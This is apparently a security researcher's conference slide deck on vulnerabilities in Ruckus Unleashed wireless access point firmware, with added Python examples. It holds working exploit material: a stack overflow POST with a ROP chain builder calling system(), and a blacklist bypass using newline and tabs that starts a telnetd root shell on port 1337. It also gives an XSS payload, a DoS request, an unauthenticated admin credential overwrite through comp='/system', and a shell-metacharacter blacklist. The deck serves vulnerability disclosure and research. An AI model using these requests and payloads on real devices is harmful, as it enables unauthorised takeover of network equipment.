Don't Ruck Us Again


The Exploit Returns 


Weird stuff 


[Slide: rkscli terminal screenshot]


echo $USER 


• Gal Zror - @waveburst

• Security research leader at Aleph Research by HCL AppScan

• 10+ RE, 0-days, exploits, embedded Linux devices




Recap 


• Credential leakages + SSH jailbreak

• Unauthenticated stack buffer overflow

• Command injection + Auth bypass


R510 Unleashed 


• APs: C110, E510, H320, H510, M510, R310, R500, R510, R600, R610, R710, R720, T300, T301n, T310d, T610, T710

• ZoneDirector line

• Unleashed firmware <= 200.7.10.102.92


What's New? 


• Patch did not fix all vulnerabilities

• Now I own a device

• New Ghidra script

Previous script


Data

Strings the previous script keyed on (Ghidra "Defined Strings" window, locations 001aeea8-001afe60). Every log line carries the calling function's name as the %s() argument, which is what the script used to name functions:

"[DEBUG] id(0x%08x) - %s(): FM auth ok\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: AuthFM(password, is_adm..."
"[DEBUG] id(0x%08x) - %s(): logout admin, del credential\n"
"[DEBUG] id(0x%08x) - %s(): cid is null\n"
"[INFO ] id(0x%08x) - %s(): cid is null\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: LogoutAdmin(session_id, i..."
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: AuthAdmin(cid, username..."
"[ERROR] id(0x%08x) - %s(): %s(not peer ZD) tried to access cluster stuffs\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: Cluster(action, value)\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: Cluster(action[, value])\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: GetSysinfo(type, filename..."
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: FmTemplate(action, file)\n"
"[ERROR] id(0x%08x) - %s(): Syntax Error, expected: UserAgentCheck(headers[..."
"[DEBUG] id(0x%08x) - %s(): ua=%s\n"
"[WARN ] id(0x%08x) - %s(): unable to handle user-agent: %s\n"
"[DEBUG] id(0x%08x) - %s(): Mac OS Verion = %d_%d\n"
"[DEBUG] id(0x%08x) - %s(): ... Linux ..."
"[ERROR] id(0x%08x) - %s(): UrlCheck it is XSS risk, redirect to %s, query %s\n"
"[ERROR] id(0x%08x) - %s(): Check register result for cid[%s] failed.\n"
"[ERROR] id(0x%08x) - %s(): Register guestsvc[%s] with Facebook failed.\n"
"[ERROR] id(0x%08x) - %s(): The maxmum of Facebook WiFi profile is %d.\n"


Decompile: getZDD... (function name cut off on the slide)

undefined * getZDD...(void)
{
  bool bVar1;
  undefined *puVar2;
  int iVar3;
  __pid_t _Var4;
  uint uVar5;
  undefined *puVar6;

  puVar2 = (undefined *)getNonLocalizedString("DOMAIN_NAME");
  iVar3 = logGetFacility();
  if (...) {
    ...
    if (bVar1) {
      puVar6 = puVar2;
      if (puVar2 == (undefined *)0x0) {
        puVar6 = &DAT_001ab198;
      }
      printf("[DEBUG] id(0x%08x) - %s(): ZD Domain Name: %s\n", 0x1000040, "getZDD...", puVar6);
    }
    ...
  }
  return puVar2;
}


New script 


Embedthis Appweb is open source, and the firmware's web server is built on it (the "Embedthis code" in the call graph below). The same literals that appear in its sources appear in the stripped binary, so a function that references one can be named after the source function that contains it. From the Appweb sources:

if ((mpr = mprCreate(0, NULL, NULL)) == 0) {
    mprError(mpr, "Can't create the web server runtime");
    return 0;
}

if (mprStart(mpr, 0) < 0) {
    mprError(mpr, "Can't start the web server runtime");
    return 0;
}

http = maCreateHttp(mpr);

if ((server = maCreateServer(http, configFile, NULL, NULL, -1)) == 0) {
    mprError(mpr, "Can't create the web server");
    return 0;
}


Script output 


undefined4 * FUN_00014f38(undefined4 param_1)
{
  undefined4 uVar1;
  uid_t _Var2;
  passwd *ppVar3;
  gid_t _Var4;
  group *pgVar5;
  undefined4 *puVar6;

  uVar1 = FUN_000b92e4(param_1, 0xa0, &LAB_00015150);
  puVar6 = (undefined4 *)FUN_00069140(uVar1, "server....");
  if (puVar6 == (undefined4 *)0x0) {
    puVar6 = (undefined4 *)0x0;
  }
  ...


[Diagram: call graph coloured by origin]
Embedthis code (named from the Appweb sources): mprCreate, mprError, maCreateHttp, maCreateServer
Unknown code (still FUN_xxxxxxxx): FUN_000130b8, FUN_000924f0, FUN_000c351c, FUN_00010b78
Ruckus code: rks_registerEspExtension, rks_...


Ghidra script - ReplaceFuncNameFromSource 


• github.com/alephsecurity/general-research-tools
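The idea behind the script, as an added stand-alone example (this is not the Aleph Research script and does not use the Ghidra API): a string literal such as "Can't create the web server runtime" occurs in exactly one function of the Appweb sources, so the unnamed firmware function that references it can be renamed after that source function. The C source below is constructed (the slide's appweb.c fragment wrapped in a function, plus two hypothetical functions), and the FUN_xxxx reference map stands in for what Ghidra would report; the addresses are invented. It also shows the two cases the matching has to refuse: a literal shared by two source functions, and a binary function whose literals point at different owners.

```python
import re

# Words that look like "name(...) {" in C but are not function definitions.
C_KEYWORDS = {"if", "while", "for", "switch", "else", "do", "return", "sizeof"}

# Constructed C source standing in for the Appweb tree. runServer() is the
# appweb.c fragment shown on the slide wrapped in a function; printUsage()
# and openLog() are hypothetical, added so the matching has an ambiguous
# literal and a conflicting function to deal with.
SOURCE = r'''
static int runServer(Mpr *mpr, char *configFile)
{
    if ((mpr = mprCreate(0, NULL, NULL)) == 0) {
        mprError(mpr, "Can't create the web server runtime");
        return 0;
    }
    if (mprStart(mpr, 0) < 0) {
        mprError(mpr, "Can't start the web server runtime");
        return 0;
    }
    http = maCreateHttp(mpr);
    if ((server = maCreateServer(http, configFile, NULL, NULL, -1)) == 0) {
        mprError(mpr, "Can't create the web server");
        return 0;
    }
    return 1;
}

static void printUsage(void)
{
    mprPrintf("usage: appweb [-c configFile]");
    mprPrintf("Can't create the web server");   /* same literal as runServer */
}

static int openLog(Mpr *mpr)
{
    mprLog(mpr, 0, "Opening log file");
    return 0;
}
'''

# Constructed stand-in for the Ghidra side: which literals each unnamed
# firmware function references (hypothetical addresses).
BINARY_REFS = {
    "FUN_0001a000": ["Can't create the web server runtime", "Can't create the web server"],
    "FUN_0001b000": ["Can't create the web server"],                       # shared literal only
    "FUN_0001c000": ["Opening log file", "usage: appweb [-c configFile]"],  # two different owners
}

_DEF = re.compile(r"\b([A-Za-z_]\w*)\s*\(([^;(){}]*)\)\s*\{")
_STR = re.compile(r'"((?:[^"\\]|\\.)*)"')


def _block(text, open_brace):
    """Return the text between text[open_brace] and its matching '}'."""
    depth = 0
    for i in range(open_brace, len(text)):
        if text[i] == "{":
            depth += 1
        elif text[i] == "}":
            depth -= 1
            if depth == 0:
                return text[open_brace + 1:i]
    raise ValueError("unbalanced braces")


def index_source(text):
    """Map every string literal to the set of source functions whose body
    contains it. Heuristic, not a C parser: a non-keyword identifier followed
    by '(...) {' is taken as a function definition."""
    index = {}
    for m in _DEF.finditer(text):
        name = m.group(1)
        if name in C_KEYWORDS:
            continue
        for literal in _STR.findall(_block(text, m.end() - 1)):
            index.setdefault(literal, set()).add(name)
    return index


def propose_renames(binary_refs, index):
    """Return {FUN_xxx: source_name} for functions whose evidence is
    unambiguous. A literal counts only if exactly one source function owns
    it, and a function is renamed only if all such literals agree."""
    renames = {}
    for fun, literals in binary_refs.items():
        owners = {next(iter(index[l])) for l in literals if len(index.get(l, ())) == 1}
        if len(owners) == 1:
            renames[fun] = owners.pop()
    return renames


if __name__ == "__main__":
    for fun, name in propose_renames(BINARY_REFS, index_source(SOURCE)).items():
        print("%s -> %s" % (fun, name))
```

Only FUN_0001a000 gets a name: its unique literal points at runServer and the shared one is ignored. FUN_0001b000 has nothing but the shared literal, and FUN_0001c000 has two literals owned by different functions, so both stay unnamed rather than being labelled wrongly.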




First Attack Scenario 


Demo Time! 


Web interface

• /bin/webs

• /bin/emfd

• /usr/lib/libemf.so


Web interface

[Diagram: request path from the web server to the shell]
/bin/webs (ejs handler)
  -> /bin/emfd: "Mapping Logic", a table of func_name -> ptr_name entries routing each command name to its handler
  -> /usr/lib/libemf.so: shell execution via /bin/sys_wrapper.sh
  -> /lib/libc.so


void rks_registerEspExtension(int param_1)
{
  DAT_001106b0 = param_1;
  rks_RegisterFuction(param_1, "S", rks_...);                        /* handler name cut off on the slide */
  rks_RegisterFuction(DAT_001106b0, ...);
  rks_RegisterFuction(DAT_001106b0, "EscapeJS", rks_EscapeJS);
  rks_RegisterFuction(DAT_001106b0, "EscapeJStr", rks_EscapeJStr);
  rks_RegisterFuction(DAT_001106b0, "Now", rks_...);
  rks_RegisterFuction(DAT_001106b0, "Delegate", rks_espDelegate);
  rks_RegisterFuction(DAT_001106b0, "DelegateAsyn", rks_espDelegateAsyn);
  rks_RegisterFuction(DAT_001106b0, "GetCookieValue", rks_espGetCookieValue);
  rks_RegisterFuction(DAT_001106b0, ...);
  rks_RegisterFuction(DAT_001106b0, "Print", rks_espPrint);
  rks_RegisterFuction(DAT_001106b0, "OauthCheckToken", rks_espOauthCheckToken);
  rks_RegisterFuction(DAT_001106b0, "HTML2Escape", rks_HTML2Escape);
  rks_extensionInit(DAT_001106b0);
  return;
}


Web interface - /bin/webs

web> wget 192.168.0.1/admin/webPage/wifiNetwork/wlanSysConfirm.jsp
web> cat ./admin/webPage/wifiNetwork/wlanSysConfirm.jsp
<%
var aeFlag = EscapeJStr(params["flag"]);
var content = params["contentKey"];
content = content || "UN_SendEmailOrSMS";
var showCancel = params["showCancel"];
%>
<div style="width:750px;margin-top:50px;..." id="wlanSysConfirm">
<s class="close_tag" style="display:<%=showCancel?'':'none'%>" id="close_wlansysconfirm">&times;</s>
<div class="head_title">
<p style="line-height:30px;padding:5% 0;"><%S(content);%></p>
<div class="button_box">
<input type="button" value="<%S("Yes")%>" class="ok" id="sysconfirm_yes">
<input type="button" style="display:<%=showCancel?'':'none'%>" value="<%S("No")%>" class="cancel" id="sysconfirm_no">
</div>
</div>
</div>
<script>
var ae_flag = '<%=aeFlag%>';
</script>


Unsafe string copy

(the rks_registerEspExtension listing above again, with the "S" registration highlighted: S() is the template function that wlanSysConfirm.jsp calls on the request-controlled contentKey, and its handler copies the argument into a stack buffer without a length check, the overflow smashed below)


Grep it

web> grep -nr "%S(" `find . -iname "*.jsp"`
11:<p style="line-height:30px;padding:5% 0;"><%S(content);%></p>
19:<%S(err_msg);%>


wlanSysConfirm.jsp

The two lines that matter: contentKey is read from the request and handed to S() unmodified.

var content = params["contentKey"];
...
<p style="line-height:30px;padding:5% 0;"><%S(content);%></p>


Smashing

2928 bytes in contentKey crash the handler:

POST /admin/webPage/wifiNetwork/wlanSysConfirm.jsp HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 2948

flag=b&contentKey=aaaa...[a*2928]...a


Exploitation

POST /admin/webPage/wifiNetwork/wlanSysConfirm.jsp HTTP/1.1
Host: 192.168.0.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 2990

flag=b&contentKey=...

Gadget 1 - sub sp, fp, #0x14 ; pop {r4, r5, r6, r7, fp, pc}
Gadget 2 - mov r0, r4 ; pop {r4, pc}

Call system()
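How the two gadgets chain into system(), as an added example that is not the talk's exploit. Known from the slides: a 2928-byte contentKey crashes the S() handler, gadget 1 pivots the stack to fp-0x14 and pops r4-r7, fp, pc, and gadget 2 moves r4 into r0 before popping r4 and pc. Everything else is an assumption made explicit as a parameter: the gadget, system() and buffer addresses are invented placeholders, and the frame layout (saved fp and pc as the last two words of the overflow) is a guess about the real binary. The payload carries binary bytes, so the form body percent-encodes it; simulate() walks the chain the way the CPU would, which is the check worth running before spending a boot cycle on the device.

```python
import struct
from urllib.parse import quote_from_bytes


def p32(v):
    """One little-endian ARM word."""
    return struct.pack("<I", v & 0xFFFFFFFF)


def build_chain(gadget2, system, cmd_addr, junk=0x41414141):
    """The words gadget1's 'pop {r4,r5,r6,r7,fp,pc}' and gadget2's 'pop {r4,pc}'
    consume, in pop order. r4 = cmd_addr is what gadget2 moves into r0."""
    return b"".join(p32(w) for w in (
        cmd_addr, junk, junk, junk, junk, gadget2,   # popped by gadget1
        junk, system,                                # popped by gadget2
    ))


def build_payload(overflow_len, gadget1, gadget2, system, buf_addr, cmd):
    """contentKey value. Layout (assumption about the S() frame): the buffer
    starts at buf_addr, the saved fp and pc are the last two words inside
    overflow_len bytes. The chain follows, then the NUL-terminated command.
    fp is chosen so that gadget1's 'sub sp, fp, #0x14' lands sp on the chain."""
    chain_addr = buf_addr + overflow_len
    chain = build_chain(gadget2, system, cmd_addr=chain_addr + 32)
    fp = chain_addr + 0x14
    return b"A" * (overflow_len - 8) + p32(fp) + p32(gadget1) + chain + cmd + b"\0"


def form_body(payload):
    """POST body in the shape shown on the slide; binary bytes percent-encoded."""
    return b"flag=b&contentKey=" + quote_from_bytes(payload).encode()


def simulate(payload, buf_addr, overflow_len, gadget1, gadget2, system):
    """Walk the chain with payload as the stack image at buf_addr.
    Returns (pc entered last, command string found at r0)."""
    def word(addr):
        off = addr - buf_addr
        return struct.unpack("<I", payload[off:off + 4])[0]

    fp = word(buf_addr + overflow_len - 8)       # overwritten saved fp
    pc = word(buf_addr + overflow_len - 4)       # overwritten saved pc
    if pc != gadget1:
        raise AssertionError("return address is not gadget1")
    sp = fp - 0x14                               # sub sp, fp, #0x14
    r4, _r5, _r6, _r7, fp, pc = (word(sp + 4 * i) for i in range(6))
    sp += 24                                     # pop {r4, r5, r6, r7, fp, pc}
    if pc != gadget2:
        raise AssertionError("pivot did not reach gadget2")
    r0 = r4                                      # mov r0, r4
    _r4, pc = word(sp), word(sp + 4)             # pop {r4, pc}
    start = r0 - buf_addr
    return pc, payload[start:payload.index(b"\0", start)]


# Hypothetical addresses standing in for the real ones on the R510.
GADGET1, GADGET2, SYSTEM, BUF = 0x00011234, 0x00022468, 0x76E4A000, 0x7EF6C000
OVERFLOW = 2928                                  # crash length from the slide
CMD = b"telnetd -l/bin/sh -p1337"

if __name__ == "__main__":
    pl = build_payload(OVERFLOW, GADGET1, GADGET2, SYSTEM, BUF, CMD)
    print(simulate(pl, BUF, OVERFLOW, GADGET1, GADGET2, SYSTEM))
    print(len(form_body(pl)), "bytes of form body")
```

The design point is that gadget 1 is a full epilogue: because it rebuilds sp from the saved fp, the attacker never has to know where the frame itself sits, only where the buffer is, and the chain can be placed right after the overwritten return address.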


Other Attacks

Other vulnerabilities found

• XSS

• DoS

• Info leak -> jailbreak


Cross-Site Scripting

Request: the updater attribute is reflected as the id of the XML response.

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 124
Connection: close

<ajax-request action='docmd' updater='!!!Chookity!!!' comp='system'>
<xcmd cmd='get-security-email-hint'/>
</ajax-request>

Response:

HTTP/1.1 200 OK
Date: Fri, 15 ...
Server: Embedthis-...
X-Frame-Options: ...
Cache-Control: ...
Content-Length: ...
Connection: close
Content-type: text/xml
X-Appweb-Seq: 46

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE ajax-response><ajax-response>
<response type="object" id="!!!Chookity!!!"><failure code="UN_E_FailSecurityInfoWrongEmail"/></response></ajax-response>

Payload (Content-Length 190): the response is served as text/xml, so an XHTML-namespaced element injected through the unescaped id attribute is rendered and its onload runs.

<ajax-request action='docmd' updater='"><a xmlns:a="http://www.w3.org/1999/xhtml"><a:body onload="alert(1)"/></a><!--' comp='system'>
<xcmd cmd='get-security-email-hint'/>
</ajax-request>


Denial of Service

A multipart body whose Content-Disposition header has an empty disposition type:

POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=abc
Content-Length: 68

--abc
Content-Disposition:; name="text123"

text default
--abc--


Information Leakage

UPnP device description:

<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.0.1/</URLBase>
<device>
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
<friendlyName>Ruckus-Unleashed 192.168.0.1</friendlyName>
<manufacturer>Ruckus Wireless</manufacturer>
<manufacturerURL>http://www.ruckuswireless.com</manufacturerURL>
<modelDescription>Ruckus Wireless Unleashed</modelDescription>
<modelName>R510</modelName>
<modelNumber>200.7.10.2</modelNumber>
<modelURL>http://www.ruckuswireless.com/</modelURL>
<serialNumber>161902007765</serialNumber>
<UDN>uuid:edb18e23-0...</UDN>
<UPC>unknown</UPC>
<iconList>
<icon>
<mimetype>image/g...</mimetype>
<width>32</width>
<height>32</height>
<depth>8</depth>
...


Command injection

[Diagram: request path and the mapping logic, with the Ghidra views it was taken from]
/bin/webs (ports 80 and 443; ejs handler)
  -> /bin/emfd: "Mapping Logic", func_name -> ptr_name entries (func_name1 -> ptr_name1, ... func_name4 -> ptr_name4), dispatched through jsa->Delegate(func_name). Entries for comp='system': cmdSpectraAnalysis, cmdPacketCapture, cmdImportCategory, cmdImportAvpPort
  -> /usr/lib/libemf.so: shell execution via /bin/sys_wrapper.sh
  -> /lib/libc.so

Ghidra Functions window, 8 items (the shell-execution sinks to chase back from): execl, execSysCmdImpl, execv, execvp, popen, popenSysCmdImpl, preadSysCmdImpl, system (locations 0001186c, 00011ba8, 00011080, 00011ed8, 00011e48, 00010fcc, 00011020, 00010a98; addresses 000ae590, 000af6f0, 000b6d60, 000b727c also shown)


Command injection

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: oa...
Cookie: -ejs-session-=...5942005c785bac52
Content-Length: 2...

<ajax-request action='docmd' xcmd='...' updater='...' comp='system'>
<xcmd cmd='import-avpport' uploadFile='...'/>
</ajax-request>

Handler before the patch: the uploadFile attribute is formatted straight into shell commands.

snprintf(command, 0x100, "... %s ...", uploadFile, ...);
system(command);
snprintf(command, 0x100, "ln -fs %s %s", "/etc/airespider/uploaded/avp...", ...);
system(command);


Patched command injection

undefined4 cmdImportAvpPort(char *param_1)
{
  ...
  uploadFile = xGetAttrString(param_1, "uploadFile", ...);
  iVar1 = is_validate_input_string(uploadFile);
  if (iVar1 == 0) {
    memset(command, 0, 0x100);
    snprintf(command, 0x100, "cp %s ...", uploadFile, ...);
    system(command);
    snprintf(command, 0x100, "ln -fs %s %s", "/etc/airespider/uploaded/avpport_file", ...);
    system(command);
    local_... = fopen(uploadFile, "r");
    ...


is_validate_input_string()

undefined4 is_validate_input_string(char *param_1)
{
  size_t sVar1;
  char *pcVar2;
  int local_c;

  if (param_1 != (char *)0x0) {
    sVar1 = strlen(param_1);
    local_c = 0;
    while (local_c < (int)sVar1) {
      pcVar2 = strchr("$;&()|<>\'\"`\\ ", (uint)(byte)param_1[local_c]);
      if (pcVar2 != (char *)0x0) {
        return 0xffffffff;
      }
      local_c = local_c + 1;
    }
  }
  return 0;
}

The blacklist, character by character:


Dollar sign
Semicolon
Ampersand
Left parenthesis
Right parenthesis
Vertical bar
Less-than sign
Greater-than sign
Single quote
Double quote
Backtick
Backslash
Space


Spot the Characters

[Slide: ASCII table with the blacklisted characters marked]


Shebang 


Previous Command Injection

POST /admin/_cmdstat.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: oaMM8EBv1Y
Cookie: -ejs-session-=x236a14bd195e0f136942005c785bac52
Content-Length: 223

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
<xcmd cmd='import-avpport' uploadFile='...' type='wlan-maxnums'/>
</ajax-request>

Against the patch (Content-Length 225): no blacklisted character, but a newline and tabs.

<ajax-request action='docmd' xcmd='get-platform-depends' updater='system.1568118269965.3208' comp='system'>
<xcmd cmd='import-avpport' uploadFile='#!/bin/sh\ntelnetd\t-l/bin/sh\t-p1337' type='wlan-maxnums'/>
</ajax-request>
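Why that payload gets through, as an added example (a Python port of the logic on the slides, not Ruckus code): the blacklist is reproduced exactly, the command is assembled the way cmdImportAvpPort() does it with snprintf(), and a small tokeniser shows what /bin/sh makes of the result. Only the "cp %s" prefix of the first command is visible on the slide, so the second cp argument is an assumption. is_safe_path() is an added allowlist alternative to the blacklist, not the vendor's fix.

```python
import re

# The 13 characters the patched is_validate_input_string() rejects
# ($ ; & ( ) | < > ' " ` \ and space), as listed on the slide.
BLACKLIST = "$;&()|<>'\"`\\ "


def is_validate_input_string(s):
    """Python port of the decompiled check: 0 = accepted, -1 = rejected."""
    if s is None:
        return 0
    for ch in s:
        if ch in BLACKLIST:
            return -1
    return 0


def build_command(upload_file, dest="/etc/airespider/uploaded/avpport_file"):
    """The string cmdImportAvpPort() builds with snprintf(command, 0x100, "cp %s ...").
    Only the 'cp %s' prefix is visible on the slide; dest is assumed."""
    return "cp %s %s" % (upload_file, dest)


def shell_lines(command):
    """How /bin/sh tokenises the string system() hands it: a newline ends a
    command, a word starting with '#' comments out the rest of its line, and
    runs of spaces or tabs separate arguments. Returns one argv per command."""
    commands = []
    for line in command.split("\n"):
        argv = []
        for word in re.split(r"[ \t]+", line):
            if word.startswith("#"):
                break
            if word:
                argv.append(word)
        if argv:
            commands.append(argv)
    return commands


def is_safe_path(s):
    """Added allowlist alternative (not the vendor fix): accept only filename
    characters and no parent-directory traversal; everything else is rejected
    instead of enumerating what the shell treats specially."""
    return re.fullmatch(r"[A-Za-z0-9._/-]+", s) is not None and ".." not in s


PAYLOAD = "#!/bin/sh\ntelnetd\t-l/bin/sh\t-p1337"   # uploadFile value from the slide

if __name__ == "__main__":
    for value in (";telnetd", "a b", PAYLOAD):
        print(repr(value), "->", is_validate_input_string(value))
    for argv in shell_lines(build_command(PAYLOAD)):
        print(argv)
```

The first line the shell sees is "cp #!/bin/sh", which the # turns into a comment after cp; the second line is telnetd with its arguments separated by tabs, followed by the cp destination as a stray extra argument. Neither newline, tab nor # is on the blacklist, which is the general weakness of this style of check: the shell's grammar has more separators than anyone lists.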


system.xml

[Slide: screenshot of system.xml; readable fragments]
password="1234abcd"
<identity name="Ruckus-Unleashed" domain="" />
<credential-reset enabled="false" security-email="" security-... encrypted="false" />
... ntp1="ntp.ruckuswireless.com" ... ipv6-dns1="" ipv6-dns2="" ... vlan-id="" />
... x-password="2345bcde" auth-token=... ip="192.168.0.1" netmask="255..." ... useip6="false" peer-ip="" passwo...
... authsvr-id="0" fallback-local=... dns2="" by-ipv6-auto="true" ... vlan-id="1" />


Credentials overwrite

Pre-login access check for the ajax handlers: setconf requests are inspected for an <admin> element, docmd requests for an <xcmd> element.

... WithoutLoginAccessCheck(undefined4 param_1, undefined4 param_2)
{
  ...
  bVar5 = false;
  ...
LAB_0005d9fc:
  if (bVar5) {
    uVar2 = FUN_0007a59c(param_1);
    __s2 = (char *)_loadXmlStr(uVar2);
    logXdataImpl(0x1000040, __s2);
    attr_action = xGetAttrString(__s2, "action", "");
    iVar1 = strcasecmp(attr_action, "setconf");
    if (iVar1 == 0) {
      iVar1 = xGetChild(__s2, "admin");
      if (iVar1 == 0) {
        printf("[ERROR] id(0x%08x) - %s() ...", 0x1000040, "WithoutLoginAccessCheck");
        ...
      }
      ...
    }
    else {
      iVar1 = strcasecmp(attr_action, "docmd");
      if (iVar1 == 0) {
        iVar1 = xGetChild(__s2, "xcmd");
        ...

CheckResetCredentialConfPara

Eight attribute names are expected on a pre-login <admin> element; each one present is logged as "hitted" and counted.

undefined4 CheckResetCredentialConfPara(undefined4 param_1)
{
  ...
  apcStack60[0] = "username";
  apcStack60[1] = "fallback-local";
  apcStack60[2] = "authsvr-id";
  apcStack60[3] = "auth-by";
  pcStack44 = "x-password";
  pcStack40 = "IS_PARTIAL";
  pcStack36 = "reset";
  pcStack32 = "auth-token";
  local_c = 0;
  local_10 = ...;
  local_14 = ...;
  attr_num = ...;
  if (attr_... ) {
    local_c = 0;
    while (local_c < local_14) {
      local_1c = apcStack60[local_c];
      iVar1 = xAttrExists(param_1, local_1c);
      if (iVar1 != 0) {
        printf("... %s hitted\n", 0x1000040, "CheckResetCredentialConfPara", ...);
        local_10 = local_10 + 1;
      }
      local_c = local_c + 1;
    }
    ...

Ajax Request

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 248
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='system'>
<admin username="admin" x-password="1234" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>


AjaxConf

Handler chain for setconf: AjaxConf -> localAddObj -> registerHandlers -> adapter_setConf

Stored admin entry before the request (system.xml):

<admin username="super" x-password="tq.benjo" privilege="rw" idletimeout="30" lang="en_US" auth-by="local" authsvr-id="0" fallback-local="true" ... />
<identity name="Ruckus-Unleashed" domain="" />
<credential-reset enabled="false" security-email="" security-question="" security-answer="" customized="false" encrypted="false" />

Request (as above):

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='system'>
<admin username="admin" x-password="1234" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

adapter_setConf

Same request as above (POST /admin/_wla_conf.jsp, comp='system'). The handler compares comp literally against "system":

int adapter_setConf(char *attr_comp, char *req_xml)
{
  ...
  iVar = adapter_validateConf(req_xml);
  if (iVar == 0) {
    iVar = strcmp(attr_comp, "system");
    if (iVar == 0) {
      uVar = xGetChild(req_xml, "...");
      iVar = xAttrExists(...);
      if (iVar > 0) {
        uVar7 = xGetConfImpl("adapter_setConf", "country-list", 0);
        pcVar = (char *)xGetAttrString(uVar7, ...);
        local_18 = xGetFirstChild(uVar7);
        while (local_18 != 0) {
          ...


Slash!!!

Same request with a leading slash in comp: strcmp(attr_comp, "system") no longer matches, but the repository lookup builds a path from it and still resolves to the system component.

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 239
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='/system'>
<admin username="admin" x-password="1234" auth-token="" reset=true IS_PARTIAL="" auth-by="local" authsvr-id='0' fallback-local="true" />
</ajax-request>

int repoGetCurChild(char *comp, char *child, bool get_default)
{
  ...
  p_Var1 = (_pool *)new_pool(0);
  pcVar2 = (char *)ps_printf(p_Var1, "%s/...", comp, ...);
  local_c = _repoGetCache("Current", p_Var1, ...);
  if (local_c == 0) {
    if (child == (char *)0x0) {
      local_c = repoGetBackup(comp);
    }
  }
  if (local_c == 0) {
    if (get_default == false) {
      ...
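The check and the use disagree about what a component name looks like, which is the whole bug. The model below is an added example built from the two decompiled fragments, not Ruckus code: adapter_setConf() compares the raw comp string with "system", repoGetCurChild() formats it into a path and resolves it, and a path lookup that skips the empty segment a leading slash produces treats "system" and "/system" as the same node. The repository dictionary and the lookup semantics are assumptions; the stored admin values are the ones the system.xml slide shows. canonical_comp() is the added fix: one normalised name feeds both the comparison and the path.

```python
import posixpath

# Constructed config repository: one "system" component holding the admin
# entry from the system.xml slide.
REPO = {"system": {"admin": {"username": "super", "x-password": "tq.benjo"}}}


def adapter_setConf_check(attr_comp):
    """strcmp(attr_comp, "system") == 0 as in the decompile: the extra
    validation branch for the system component runs only on an exact match."""
    return attr_comp == "system"


def repoGetCurChild(comp, child):
    """ps_printf(pool, "%s/...", comp, ...) followed by a repository lookup
    (lookup semantics assumed). Splitting on '/' drops the empty segment a
    leading slash produces, so 'system' and '/system' reach the same node."""
    path = "%s/%s" % (comp, child)
    node = REPO
    for part in [p for p in path.split("/") if p]:
        node = node.get(part) if isinstance(node, dict) else None
        if node is None:
            return None
    return node


def setconf(attr_comp, child, attrs):
    """Model of the request flow: the check keys on the raw comp string, the
    write keys on the resolved path. Returns (outcome, validated)."""
    validated = adapter_setConf_check(attr_comp)
    node = repoGetCurChild(attr_comp, child)
    if node is None:
        return "not found", validated
    node.update(attrs)
    return "written", validated


def canonical_comp(attr_comp):
    """Fix: derive one canonical component name and use it for both the
    comparison and the path, so no spelling of the name skips a check."""
    return posixpath.normpath("/" + attr_comp).lstrip("/")


if __name__ == "__main__":
    for comp in ("system", "/system"):
        print(comp, "->", setconf(comp, "admin", {"x-password": "1234"}))
    print("canonical:", canonical_comp("/system"), canonical_comp("/./system/"))
```

With comp='system' the write happens after validation; with comp='/system' the same write happens with validation skipped. The fix is not to blacklist the slash but to stop comparing one representation and resolving another.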


Overwrite

The admin element now carries the attacker's credentials, with reset="true":

ruckus$ cat /writable/etc/airespider/system.xml
<system>
<admin-threshold />
<identity name="Ruckus-Unleashed" domain="" />
<admin username="admin" x-password="Mfoobs" auth-token="" reset="true" IS_PARTIAL="" ... />
<credential-reset enabled="false" security-email="" security-... answer="" customized="false" encrypted="false" />
<internal is-factory="false" default-login="admin" ... />
<... redirect-policy6-id="1" guest-policy6-id="2" system-mesh-id="1" stp="disable" ... />
<time by-ntp="true" time="0" ntp1="ntp.ruckuswireless.com" timezone="GMT" />
<mgmt-ip by-dhcp="true" ip="192.168.0.1" netmask="255.255.255.0" gateway="192.168.0.1" dns1="" dns2="" by-ipv6-auto="true" ipv6="fc00::2" prefixlength="64" ipv6-gateway="" ipv6-dns1="" ipv6-dns2="" ipmode="1" />
<addif enabled="false" ip="" netmask="" gateway="" enabled-ipv6="false" ipv6="" prefixlength="" ipv6-gateway="" vlan-id="1" />
<mgmt-vlan enabled="false" vlan-id="" />
<cluster enabled="false" useip6="false" peer-ip="" password="" />
<dhcps enabled="false" ip-start="" ip-end="" option-60-value="Ruckus CPE" range="0" netmask="255.255.0.0" lease="" />


Chaining + Footprinting

Step 1: the unauthenticated credential overwrite.

POST /admin/_wla_conf.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 239
Connection: close

<ajax-request action='setconf' updater='acl-list.1579433244273.4243' comp='/system'>
